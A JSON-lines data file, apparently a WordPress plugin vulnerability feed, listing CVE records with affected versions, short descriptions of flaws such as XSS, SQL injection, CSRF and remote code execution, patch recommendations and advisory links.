{"CVE_ID":"CVE-2024-4875","slug":"ht-mega-for-elementor","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd3868a-d741-42b4-bc7f-6fb5d33bb71b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd3868a-d741-42b4-bc7f-6fb5d33bb71b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8420","slug":"request-a-quote","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The Request a Quote Form plugin for WordPress is vulnerable to Remote Code Execution in version less than, or equal to, 2.5.2 via the emd_form_builder_lite_pagenum function. This is due to the plugin not properly validating user input before using it as a function name. This makes it possible for unauthenticated attackers to execute code on the server, however, parameters can not be passed to the functions called.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338854%40request-a-quote&new=3338854%40request-a-quote&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338854%40request-a-quote&new=3338854%40request-a-quote&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/601aa2b5-aeac-49bc-960d-4b4ff83e9229?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/601aa2b5-aeac-49bc-960d-4b4ff83e9229?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4373","slug":"better-search","versionEndExcluding":"2.5.3","description":"The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to import settings via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6c595-dad2-4abc-8187-ed72355273b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6c595-dad2-4abc-8187-ed72355273b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473344\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5522","slug":"html5-video-player","versionImpact":"2.5.26","versionEndExcluding":"2.5.27","description":"The HTML5 Video Player  WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","recommendation":"Update to version 2.5.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc76ef95-a2a9-4185-8ed9-1059097a506a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc76ef95-a2a9-4185-8ed9-1059097a506a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1061","slug":"UNKNOWN-CVE-2023-6485-1","versionImpact":"2.5.24","versionEndExcluding":"2.5.25","description":"The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the \u00a0'get_view' function.\n","recommendation":"Update to version 2.5.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-02\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-02\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34368","slug":"kanban","versionEndExcluding":"2.5.21","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Kanban for WordPress Kanban Boards for WordPress plugin <=\u00a02.5.20 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0873","slug":"kanban","versionEndExcluding":"2.5.21","description":"The Kanban Boards for WordPress plugin before 2.5.21 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8816d4c1-9e8e-4b6f-a36a-10a98a7ccfcd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8816d4c1-9e8e-4b6f-a36a-10a98a7ccfcd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1528","slug":"search-filter-pro","versionImpact":"2.5.19","versionEndExcluding":"2.5.20","description":"The Search & Filter Pro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_meta_values' function in all versions up to, and including, 2.5.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the values of arbitrary post meta.","recommendation":"Update to version 2.5.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/searchandfilter.com\\\/search-filter-2-5-20-security-release\\\/\",\"name\":\"https:\\\/\\\/searchandfilter.com\\\/search-filter-2-5-20-security-release\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47adb5fe-534f-48a9-81a3-883e1d2cda7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47adb5fe-534f-48a9-81a3-883e1d2cda7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11585","slug":"wp-hide-security-enhancer","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The WP Hide & Security Enhancer plugin for WordPress is vulnerable to arbitrary file contents deletion due to a missing authorization and insufficient file path validation in the file-process.php in all versions up to, and including, 2.5.1. This makes it possible for unauthenticated attackers to delete the contents of arbitrary files on the server, which can break the site or lead to data loss.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-security-enhancer\\\/tags\\\/2.5.1\\\/router\\\/file-process.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-security-enhancer\\\/tags\\\/2.5.1\\\/router\\\/file-process.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4238","slug":"prevent-file-access","versionEndExcluding":"2.5.2","description":"The Prevent files \/ folders access WordPress plugin before 2.5.2 does not validate files to be uploaded, which could allow attackers to upload arbitrary files such as PHP on the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53816136-4b1a-4b7d-b73b-08a90c2a638f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53816136-4b1a-4b7d-b73b-08a90c2a638f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6254","slug":"brizy","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on form submissions. This makes it possible for unauthenticated attackers to submit forms intended for public use as another user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. On sites where unfiltered_html is enabled, this can lead to the admin unknowingly adding a Stored Cross-Site Scripting payload.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75ec04f1-8bea-4514-b1d0-da5b305219d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75ec04f1-8bea-4514-b1d0-da5b305219d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3129495%40brizy%2Ftrunk&old=3125955%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3129495%40brizy%2Ftrunk&old=3125955%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13540","slug":"byconsole-woo-order-delivery-time","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The WooODT Lite \u2013 Delivery & pickup date time location for WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.5.1. This is due the \/inc\/bycwooodt_get_all_orders.php file being publicly accessible and generating a publicly visible error message. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/byconsole-woo-order-delivery-time\\\/trunk\\\/inc\\\/bycwooodt_get_all_orders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/byconsole-woo-order-delivery-time\\\/trunk\\\/inc\\\/bycwooodt_get_all_orders.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4158f6ff-8e0f-4531-8c94-f59220d6fea6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4158f6ff-8e0f-4531-8c94-f59220d6fea6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5181","slug":"wp-discord-invite","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The WP Discord Invite WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/564ad2b0-6ba6-4415-98d7-8d41bc1c3d44\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/564ad2b0-6ba6-4415-98d7-8d41bc1c3d44\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5093","slug":"responsive-lightbox","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The Responsive Lightbox & Gallery WordPress plugin before 2.5.2 use the Swipebox library which does not validate and escape title attributes before outputting them back in a page\/post where used, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2684","slug":"file-renaming-on-upload","versionEndExcluding":"2.5.2","description":"The File Renaming on Upload WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42b1f017-c497-4825-b12a-8dce3e108a55\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42b1f017-c497-4825-b12a-8dce3e108a55\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2294","slug":"kubio","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kubio\\\/tags\\\/2.5.1\\\/lib\\\/integrations\\\/third-party-themes\\\/editor-hooks.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kubio\\\/tags\\\/2.5.1\\\/lib\\\/integrations\\\/third-party-themes\\\/editor-hooks.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fb44c6e-520e-4a9f-9987-8b770feb710d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fb44c6e-520e-4a9f-9987-8b770feb710d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36742","slug":"custom-field-template","versionEndExcluding":"2.5.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on the edit_meta_value() function. This makes it possible for unauthenticated attackers to edit meta field values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3444c4b0-4619-482f-8313-d3006aa1e845?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3444c4b0-4619-482f-8313-d3006aa1e845?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368204%40custom-field-template&new=2368204%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368204%40custom-field-template&new=2368204%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6485","slug":"html5-video-player","versionImpact":"2.5.18","versionEndExcluding":"2.5.19","description":"The Html5 Video Player WordPress plugin before 2.5.19 does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins","recommendation":"Update to version 2.5.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759b3866-c619-42cc-94a8-0af6d199cc81\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759b3866-c619-42cc-94a8-0af6d199cc81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6481","slug":"search-filter-pro","versionImpact":"2.5.17","versionEndExcluding":"2.5.18","description":"The Search & Filter Pro WordPress plugin before 2.5.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53357868-2bcb-48eb-8abd-83186ff8d027\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53357868-2bcb-48eb-8abd-83186ff8d027\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26017","slug":"job-postings","versionEndExcluding":"2.5.11","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in BlueGlass Jobs for WordPress plugin <=\u00a02.5.10.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4980","slug":"wpkoi-templates-for-elementor","versionImpact":"2.5.9","versionEndExcluding":"2.5.11","description":"The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'id', 'mixColor', 'backgroundColor', 'saveInCookies', and 'autoMatchOsTheme' parameters in all versions up to, and including, 2.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6054a885-e67a-4731-93ea-64d7f90d9ea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6054a885-e67a-4731-93ea-64d7f90d9ea8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/advanced-heading\\\/advanced-heading.php#L626\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/advanced-heading\\\/advanced-heading.php#L626\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/qr-code\\\/qr-code.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/qr-code\\\/qr-code.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/darkmode\\\/darkmode.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/darkmode\\\/darkmode.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088306\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088306\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-44743","slug":"job-postings","versionEndExcluding":"2.5.11","description":"Auth. (author+) Stored Cross-Site Scripting (XSS) vulnerability in BlueGlass Jobs for WordPress plugin <=\u00a02.5.11.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-auth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-auth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12121","slug":"broken-link-finder","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207590\\\/broken-link-finder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207590\\\/broken-link-finder\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13673","slug":"big-boom-directory","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Big Boom Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bbd-search' shortcode in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258281%40big-boom-directory&new=3258281%40big-boom-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258281%40big-boom-directory&new=3258281%40big-boom-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262078%40big-boom-directory&new=3262078%40big-boom-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262078%40big-boom-directory&new=3262078%40big-boom-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5284cbe4-1550-4f3c-be54-e2de8a089512?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5284cbe4-1550-4f3c-be54-e2de8a089512?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3105","slug":"insert-php","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Woody code snippets \u2013 Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server.","recommendation":"Update to version 2.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/134ad095-b0a0-4f0f-832d-3e558d4a250a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/134ad095-b0a0-4f0f-832d-3e558d4a250a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/class.plugin.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/class.plugin.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/shortcodes\\\/shortcode-insert-php.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php\\\/trunk\\\/includes\\\/shortcodes\\\/shortcode-insert-php.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3102522%40insert-php&new=3102522%40insert-php&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3102522%40insert-php&new=3102522%40insert-php&sfp_email=&sfph_m